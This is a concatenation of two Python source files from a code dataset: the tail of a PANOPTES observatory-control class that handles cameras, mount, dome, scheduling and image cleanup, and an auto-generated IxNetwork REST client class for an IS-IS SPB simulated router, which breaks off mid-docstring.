self.logger.debug(f"Sun {self._local_sun_pos:.02f} > {horizon_deg} [{horizon}]")
return is_dark
##########################################################################
# Properties
##########################################################################
@property
def sidereal_time(self):
return self.observer.local_sidereal_time(current_time())
@property
def has_cameras(self):
return len(self.cameras) > 0
@property
def primary_camera(self):
"""Return primary camera.
Note:
If no camera has been marked as primary this will return the first
camera in the OrderedDict as primary.
Returns:
`pocs.camera.Camera`: The primary camera.
"""
if not self._primary_camera and self.has_cameras:
return self.cameras[list(self.cameras.keys())[0]]
else:
return self._primary_camera
@primary_camera.setter
def primary_camera(self, cam):
cam.is_primary = True
self._primary_camera = cam
@property
def current_observation(self):
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot get current observation.')
return None
return self.scheduler.current_observation
@current_observation.setter
def current_observation(self, new_observation):
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot set current observation.')
else:
self.scheduler.current_observation = new_observation
@property
def has_dome(self):
return self.dome is not None
@property
def can_observe(self):
"""A dynamic property indicating whether or not observations are possible.
This property will check to make sure that the following are present:
* Scheduler
* Cameras
* Mount
If any of the above are not present then a log message is generated and
the property returns False.
Returns:
bool: True if observations are possible, False otherwise.
"""
checks = {
'scheduler': self.scheduler is not None,
'cameras': self.has_cameras is True,
'mount': self.mount is not None,
}
can_observe = all(checks.values())
if can_observe is False:
for check_name, is_true in checks.items():
if not is_true:
self.logger.warning(f'{check_name.title()} not present')
return can_observe
##########################################################################
# Device Getters/Setters
##########################################################################
def add_camera(self, cam_name, camera):
"""Add camera to list of cameras as cam_name.
Args:
cam_name (str): The name to use for the camera, e.g. `Cam00`.
camera (`pocs.camera.camera.Camera`): An instance of the `~Camera` class.
"""
assert isinstance(camera, AbstractCamera)
self.logger.debug(f'Adding {cam_name}: {camera}')
if cam_name in self.cameras:
self.logger.debug(
f'{cam_name} already exists, replacing existing camera under that name.')
self.cameras[cam_name] = camera
if camera.is_primary:
self.primary_camera = camera
def remove_camera(self, cam_name):
"""Remove cam_name from list of attached cameras.
Note:
If you remove and then add a camera you will change the index order
of the camera. If you prefer to keep the same order then use `add_camera`
with the same name as an existing camera to to update the list and preserve
the order.
Args:
cam_name (str): Name of camera to remove.
"""
self.logger.debug('Removing {}'.format(cam_name))
del self.cameras[cam_name]
def set_scheduler(self, scheduler):
"""Sets the scheduler for the `Observatory`.
Args:
scheduler (`pocs.scheduler.BaseScheduler`): An instance of the `~BaseScheduler` class.
"""
self._set_hardware(scheduler, 'scheduler', BaseScheduler)
def set_dome(self, dome):
"""Set's dome or remove the dome for the `Observatory`.
Args:
dome (`pocs.dome.AbstractDome`): An instance of the `~AbstractDome` class.
"""
self._set_hardware(dome, 'dome', AbstractDome)
def set_mount(self, mount):
"""Sets the mount for the `Observatory`.
Args:
mount (`pocs.mount.AbstractMount`): An instance of the `~AbstractMount` class.
"""
self._set_hardware(mount, 'mount', AbstractMount)
def _set_hardware(self, new_hardware, hw_type, hw_class):
# Lookup the set method for the hardware type.
hw_attr = getattr(self, hw_type)
if isinstance(new_hardware, hw_class):
self.logger.success(f'Adding {new_hardware}')
setattr(self, hw_type, new_hardware)
elif new_hardware is None:
if hw_attr is not None:
self.logger.success(f'Removing hw_attr={hw_attr!r}')
setattr(self, hw_type, None)
else:
raise TypeError(f"{hw_type.title()} is not an instance of {str(hw_class)} class")
##########################################################################
# Methods
##########################################################################
def initialize(self):
"""Initialize the observatory and connected hardware """
self.logger.debug("Initializing mount")
self.mount.initialize()
if self.dome:
self.dome.connect()
def power_down(self):
"""Power down the observatory. Currently just disconnects hardware.
"""
self.logger.debug("Shutting down observatory")
if self.mount:
self.mount.disconnect()
if self.dome:
self.dome.disconnect()
@property
def status(self):
"""Get status information for various parts of the observatory."""
status = {'can_observe': self.can_observe}
now = current_time()
try:
if self.mount and self.mount.is_initialized:
status['mount'] = self.mount.status
current_coords = self.mount.get_current_coordinates()
status['mount']['current_ha'] = self.observer.target_hour_angle(now, current_coords)
if self.mount.has_target:
target_coords = self.mount.get_target_coordinates()
status['mount']['mount_target_ha'] = self.observer.target_hour_angle(now,
target_coords)
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get mount status: {e!r}")
try:
if self.dome:
status['dome'] = self.dome.status
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get dome status: {e!r}")
try:
if self.current_observation:
status['observation'] = self.current_observation.status
status['observation']['field_ha'] = self.observer.target_hour_angle(now,
self.current_observation.field)
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get observation status: {e!r}")
try:
status['observer'] = {
'siderealtime': str(self.sidereal_time),
'utctime': now,
'localtime': datetime.now(),
'local_evening_astro_time': self._evening_astro_time,
'local_morning_astro_time': self._morning_astro_time,
'local_sun_set_time': self._local_sunset,
'local_sun_rise_time': self._local_sunrise,
'local_sun_position': self._local_sun_pos,
'local_moon_alt': self.observer.moon_altaz(now).alt,
'local_moon_illumination': self.observer.moon_illumination(now),
'local_moon_phase': self.observer.moon_phase(now),
}
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get time status: {e!r}")
return status
def get_observation(self, *args, **kwargs):
"""Gets the next observation from the scheduler
Returns:
observation (pocs.scheduler.observation.Observation or None): An
an object that represents the observation to be made
Raises:
error.NoObservation: If no valid observation is found
"""
self.logger.debug("Getting observation for observatory")
if not self.scheduler:
self.logger.info(f'Scheduler not present, cannot get the next observation.')
return None
# If observation list is empty or a reread is requested
reread_fields_file = (
self.scheduler.has_valid_observations is False or
kwargs.get('reread_fields_file', False) or
self.get_config('scheduler.check_file', default=False)
)
# This will set the `current_observation`
self.scheduler.get_observation(reread_fields_file=reread_fields_file, *args, **kwargs)
if self.current_observation is None:
self.scheduler.clear_available_observations()
raise error.NoObservation("No valid observations found")
return self.current_observation
def cleanup_observations(self, upload_images=None, make_timelapse=None, keep_jpgs=None):
"""Cleanup observation list
Loops through the `observed_list` performing cleanup tasks. Resets
`observed_list` when done.
Args:
upload_images (None or bool, optional): If images should be uploaded to a Google
Storage bucket, default to config item `panoptes_network.image_storage` then False.
make_timelapse (None or bool, optional): If a timelapse should be created
(requires ffmpeg), default to config item `observations.make_timelapse` then True.
keep_jpgs (None or bool, optional): If JPG copies of observation images should be kept
on local hard drive, default to config item `observations.keep_jpgs` then True.
"""
if upload_images is None:
upload_images = self.get_config('panoptes_network.image_storage', default=False)
if make_timelapse is None:
make_timelapse = self.get_config('observations.make_timelapse', default=True)
if keep_jpgs is None:
keep_jpgs = self.get_config('observations.keep_jpgs', default=True)
process_script = 'upload-image-dir.py'
process_script_path = os.path.join(os.environ['POCS'], 'scripts', process_script)
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot finish cleanup.')
return
for seq_time, observation in self.scheduler.observed_list.items():
self.logger.debug("Housekeeping for {}".format(observation))
observation_dir = os.path.join(
self._image_dir,
'fields',
observation.field.field_name
)
self.logger.debug(f'Searching directory: {observation_dir}')
for cam_name, camera in self.cameras.items():
self.logger.debug(f'Cleanup for camera {cam_name} [{camera.uid}]')
seq_dir = os.path.join(
observation_dir,
camera.uid,
seq_time
)
self.logger.info(f'Cleaning directory {seq_dir}')
process_cmd = [
process_script_path,
'--directory', seq_dir,
]
if upload_images:
process_cmd.append('--upload')
if make_timelapse:
process_cmd.append('--make-timelapse')
if keep_jpgs is False:
process_cmd.append('--remove-jpgs')
# Start the subprocess in background and collect proc object.
clean_proc = subprocess.Popen(process_cmd,
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.logger.info('Cleaning directory pid={}'.format(clean_proc.pid))
# Block and wait for directory to finish
try:
outs, errs = clean_proc.communicate(timeout=3600) # one hour
if outs and outs > '':
self.logger.info(f'Output from clean: {outs}')
if errs and errs > '':
self.logger.info(f'Errors from clean: {errs}')
except Exception as e: # pragma: no cover
self.logger.error(f'Error during cleanup_observations: {e!r}')
clean_proc.kill()
outs, errs = clean_proc.communicate(timeout=10)
if outs and outs > '':
self.logger.info(f'Output from clean: {outs}')
if errs and errs > '':
self.logger.info(f'Errors from clean: {errs}')
self.logger.debug('Cleanup finished')
self.scheduler.reset_observed_list()
def observe(self):
"""Take individual images for the current observation
This method gets the current observation and takes the next
corresponding exposure.
"""
# Get observatory metadata
headers = self.get_standard_headers()
# All cameras share a similar start time
headers['start_time'] = current_time(flatten=True)
# List of camera events to wait for to signal exposure is done
# processing
observing_events = dict()
# Take exposure with each camera
for cam_name, camera in self.cameras.items():
self.logger.debug(f"Exposing for camera: {cam_name}")
try:
# Start the exposures
camera_observe_event = camera.take_observation(self.current_observation, headers)
observing_events[cam_name] = camera_observe_event
except Exception as e:
self.logger.error(f"Problem waiting for images: {e!r}")
return observing_events
def analyze_recent(self):
"""Analyze the most recent exposure
Compares the most recent exposure to the reference exposure and determines
the offset between the two.
Returns:
dict: Offset information
"""
# Clear the offset info
self.current_offset_info = None
pointing_image_id, pointing_image = self.current_observation.pointing_image
self.logger.debug(f"Analyzing recent image using pointing image: '{pointing_image}'")
try:
# Get the image to compare
image_id, image_path = self.current_observation.last_exposure
current_image = Image(image_path, location=self.earth_location)
solve_info = current_image.solve_field(skip_solved=False)
self.logger.debug(f"Solve Info: {solve_info}")
# Get the offset between the two
self.current_offset_info = current_image.compute_offset(pointing_image)
self.logger.debug(f'Offset Info: {self.current_offset_info}')
# Store the offset information
self.db.insert_current('offset_info', {
'image_id': image_id,
'd_ra': self.current_offset_info.delta_ra.value,
'd_dec': self.current_offset_info.delta_dec.value,
'magnitude': self.current_offset_info.magnitude.value,
'unit': 'arcsec',
})
except error.SolveError:
self.logger.warning("Can't solve field, skipping")
except Exception as e:
self.logger.warning(f"Problem in analyzing: {e!r}")
return self.current_offset_info
def update_tracking(self, **kwargs):
"""Update tracking with rate adjustment.
The `current_offset_info` contains information about how far off
the center of the current image is from the pointing image taken
at the start of an observation. This offset info is given in arcseconds
for the RA and Dec.
A mount will accept guiding adjustments in number of milliseconds
to move in a specified direction, where the direction is either `east/west`
for the RA axis and `north/south` for the Dec.
Here we take the number of arcseconds that the mount is offset and,
via the `mount.get_ms_offset`, find the number of milliseconds we
should adjust in a given direction, one for each axis.
The minimum and maximum tracking corrections can be passed as keyword
arguments (`min_tracking_threshold=100` and `max_tracking_threshold=99999`)
or can be specified in the mount config settings.
Args:
**kwargs: Keyword arguments that are passed to `get_tracking_correction`
and `correct_tracking`.
"""
if self.current_offset_info is not None:
self.logger.debug("Updating the tracking")
# Get the pier side of pointing image
_, pointing_image = self.current_observation.pointing_image
pointing_ha = pointing_image.header_ha
try:
pointing_ha = pointing_ha.value
except AttributeError:
pass
self.logger.debug("Pointing HA: {:.02f}".format(pointing_ha))
correction_info = self.mount.get_tracking_correction(
self.current_offset_info,
pointing_ha,
**kwargs
)
try:
self.mount.correct_tracking(correction_info, **kwargs)
except error.Timeout:
self.logger.warning("Timeout while correcting tracking")
def get_standard_headers(self, observation=None):
"""Get a set of standard headers
Args:
observation (`~pocs.scheduler.observation.Observation`, optional): The
observation to use for header values. If None is given, use
the `current_observation`.
Returns:
dict: The standard headers
"""
if observation is None:
observation = self.current_observation
assert observation is not None, self.logger.warning(
"No observation, can't get headers")
field = observation.field
self.logger.debug("Getting headers for : {}".format(observation))
t0 = current_time()
moon = get_moon(t0, self.observer.location)
headers = {
'airmass': self.observer.altaz(t0, field).secz.value,
'creator': "POCSv{}".format(self.__version__),
'elevation': self.location.get('elevation').value,
'ha_mnt': self.observer.target_hour_angle(t0, field).value,
'latitude': self.location.get('latitude').value,
'longitude': self.location.get('longitude').value,
'moon_fraction': self.observer.moon_illumination(t0),
'moon_separation': field.coord.separation(moon).value,
'observer': self.get_config('name', default=''),
'origin': 'Project PANOPTES',
'tracking_rate_ra': self.mount.tracking_rate,
}
# Add observation metadata
headers.update(observation.status)
# Explicitly convert EQUINOX to float
try:
equinox = float(headers['equinox'].replace('J', ''))
except BaseException:
equinox = 2000. # We assume J2000
headers['equinox'] = equinox
return headers
def autofocus_cameras(self, camera_list=None, **kwargs):
"""
Perform autofocus on all cameras with focus capability, or a named subset
of these. Optionally will perform a coarse autofocus first, otherwise will
just fine tune focus.
Args:
camera_list (list, optional): list containing names of cameras to autofocus.
**kwargs: Options passed to the underlying `Focuser.autofocus` method.
Returns:
dict of str:threading_Event key:value pairs, containing camera names and
corresponding Events which will be set when the camera completes autofocus.
"""
if camera_list:
# Have been passed a list of camera names, extract dictionary
# containing only cameras named in the list
cameras = {cam_name: self.cameras[
cam_name] for cam_name in camera_list if cam_name in self.cameras.keys()}
if cameras == {}:
self.logger.warning(
"Passed a list of camera names ({}) but no matches found".format(camera_list))
else:
# No cameras specified, will try to autofocus all cameras from
# self.cameras
cameras = self.cameras
autofocus_events = dict()
# Start autofocus with each camera
for cam_name, camera in cameras.items():
self.logger.debug("Autofocusing camera: {}".format(cam_name))
try:
assert camera.focuser.is_connected
except AttributeError:
self.logger.debug(
'Camera {} has no focuser, skipping autofocus'.format(cam_name))
except AssertionError:
self.logger.debug(
'Camera {} focuser not connected, skipping autofocus'.format(cam_name))
else:
try:
# Start the autofocus
autofocus_event = camera.autofocus(**kwargs)
except Exception as e:
self.logger.error(
"Problem running autofocus: {}".format(e))
else:
autofocus_events[cam_name] = autofocus_event
return autofocus_events
def open_dome(self):
"""Open the dome, if there is one.
Returns: False if there is a problem opening the dome,
else True if open (or if not exists).
"""
if not self.dome:
return True
if not self.dome.connect():
return False
if not self.dome.is_open:
self.logger.info('Opening dome')
return self.dome.open()
def close_dome(self):
"""Close the dome, if there is one.
Returns: False if there is a problem closing the dome,
else True if closed (or if not exists).
"""
if not self.dome:
return True
if not self.dome.connect():
return False
if not self.dome.is_closed:
self.logger.info('Closed dome')
return self.dome.close()
| 38.489422 | 115 | 0.589835 |
9762874865c463e8b14fad474b7764e771e56200 | 24,015 | py | Python | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 20 | 2019-05-07T01:59:14.000Z | 2022-02-11T05:24:47.000Z | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 60 | 2019-04-03T18:59:35.000Z | 2022-02-22T12:05:05.000Z | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 13 | 2019-05-20T10:48:31.000Z | 2021-10-06T07:45:44.000Z | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class IsisSpbSimRouter(Base):
"""SPB Simulated Router Edge
The IsisSpbSimRouter class encapsulates a list of isisSpbSimRouter resources that are managed by the user.
A list of resources can be retrieved from the server using the IsisSpbSimRouter.find() method.
The list can be managed by using the IsisSpbSimRouter.add() and IsisSpbSimRouter.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'isisSpbSimRouter'
_SDM_ATT_MAP = {
'Active': 'active',
'BridgePriority': 'bridgePriority',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'Errors': 'errors',
'Multiplier': 'multiplier',
'Name': 'name',
'SessionStatus': 'sessionStatus',
'SpSourceId': 'spSourceId',
'SpbTopologyCount': 'spbTopologyCount',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'SystemId': 'systemId',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(IsisSpbSimRouter, self).__init__(parent, list_op)
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def SpbSimEdgeTopologyList(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.spbsimedgetopologylist_5e9b551439bb252c1fa3e2c6948a1432.SpbSimEdgeTopologyList): An instance of the SpbSimEdgeTopologyList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.spbsimedgetopologylist_5e9b551439bb252c1fa3e2c6948a1432 import SpbSimEdgeTopologyList
if self._properties.get('SpbSimEdgeTopologyList', None) is not None:
return self._properties.get('SpbSimEdgeTopologyList')
else:
return SpbSimEdgeTopologyList(self)._select()
@property
def Active(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def BridgePriority(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Bridge Priority
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BridgePriority']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def SpSourceId(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): SP Source Id
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SpSourceId']))
@property
def SpbTopologyCount(self):
# type: () -> int
"""
Returns
-------
- number: Topology Count
"""
return self._get_attribute(self._SDM_ATT_MAP['SpbTopologyCount'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def SystemId(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): System Id
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SystemId']))
def update(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, str, List[str]) -> IsisSpbSimRouter
"""Updates isisSpbSimRouter resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, str, List[str]) -> IsisSpbSimRouter
"""Adds a new isisSpbSimRouter resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Returns
-------
- self: This instance with all currently retrieved isisSpbSimRouter resources using find and the newly added isisSpbSimRouter resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained isisSpbSimRouter resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, Multiplier=None, Name=None, SessionStatus=None, SpbTopologyCount=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves isisSpbSimRouter resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve isisSpbSimRouter resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all isisSpbSimRouter resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
- SpbTopologyCount (number): Topology Count
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns
-------
- self: This instance with matching isisSpbSimRouter resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of isisSpbSimRouter data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the isisSpbSimRouter resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
